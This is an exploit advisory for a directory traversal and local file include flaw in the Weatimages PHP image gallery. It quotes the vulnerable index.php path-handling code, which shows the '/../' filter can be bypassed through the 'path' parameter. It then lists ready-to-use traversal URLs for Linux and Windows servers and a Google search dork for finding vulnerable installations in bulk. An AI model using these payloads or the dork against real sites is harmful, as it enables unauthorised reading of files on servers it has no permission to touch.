51 lines
No EOL
1.1 KiB
Text
51 lines
No EOL
1.1 KiB
Text
Weatimages Directory Traversal&Local File Include Vulnerabilities
|
|
|
|
By: e.wiZz!
|
|
|
|
|
|
############Script info:
|
|
|
|
############Site: http://nazarkin.name/projects/weatimages/download.php
|
|
|
|
|
|
|
|
In the wild...
|
|
|
|
#######################################################
|
|
|
|
|
|
#######index.php:
|
|
|
|
...
|
|
|
|
//kill oneself if user trying to access resource with '/../' in path
|
|
if (strstr(urldecode($_SERVER['REQUEST_URI']), '/../')) { fatal_error('Suspicious query rejected'); }
|
|
|
|
...
|
|
|
|
if (!$REQUEST_PATH) {
|
|
if ($_GET['path']) { //compatibility mode enabled and we have some path
|
|
$REQUEST_PATH = $_GET['path'];
|
|
$SERVER_PHP_SELF = $_SERVER['SCRIPT_NAME'] . '/' . $REQUEST_PATH . '/';
|
|
}
|
|
else { //we are in the root directory
|
|
$REQUEST_PATH = '.';
|
|
}
|
|
}
|
|
|
|
...
|
|
|
|
...huh, did you know there are Windows servers?
|
|
|
|
#####List files in directory you want(linux):
|
|
|
|
http://inthewild/index.php?path=../
|
|
http://inthewild/index.php?path=../..
|
|
|
|
##### Windows?:
|
|
|
|
http://inthewild/index.php?path=..\anything
|
|
|
|
|
|
########Dork:
|
|
http://www.google.ba/#hl=bs&q=%22Powered+by+Weatimages%22&start=20&sa=N&fp=73afe0b6734a45d2 (google says 200 000,i dont trust them) |